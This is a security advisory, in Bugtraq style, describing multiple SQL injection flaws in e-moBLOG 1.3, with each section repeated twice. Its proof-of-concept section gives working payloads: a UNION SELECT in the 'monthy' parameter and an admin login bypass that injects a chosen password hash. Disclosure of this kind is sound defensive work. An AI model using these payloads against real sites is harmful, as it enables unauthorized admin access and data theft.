e-moBLOG Multiple SQL Injection Vulnerabilities
BID:16344
Info
e-moBLOG Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 16344 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 23 2006 12:00AM |
| Updated: | Feb 07 2006 08:54PM |
| Credit: | Aliaksandr Hartsuyeu is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
e-motionalis.net e-moBLOG 1.3 |
| Not Vulnerable: | |
Discussion
e-moBLOG Multiple SQL Injection Vulnerabilities
The e-moBLOG application is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Version 1.3 is vulnerable; other versions may also be affected.
The e-moBLOG application is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Version 1.3 is vulnerable; other versions may also be affected.
Exploit / POC
e-moBLOG Multiple SQL Injection Vulnerabilities
An exploit is not required.
Example URI are available:
http://www.example.com/emoblog/index.php? monthy=2006017'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10/*#1
http://www.example.com/emoblog/admin/index.php
username: aaa' union select 'bbb', '[md5-hash of anypass]'/*
password: [anypass]
An exploit is not required.
Example URI are available:
http://www.example.com/emoblog/index.php? monthy=2006017'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10/*#1
http://www.example.com/emoblog/admin/index.php
username: aaa' union select 'bbb', '[md5-hash of anypass]'/*
password: [anypass]
Solution / Fix
e-moBLOG Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
e-moBLOG Multiple SQL Injection Vulnerabilities
References:
References:
- e-moBLOG SQL Injection Vulnerability (eVuln.com)
- e-moBLOG Web Site (e-motionalis.net )
- [eVuln] e-moBLOG SQL Injection Vulnerability ([email protected])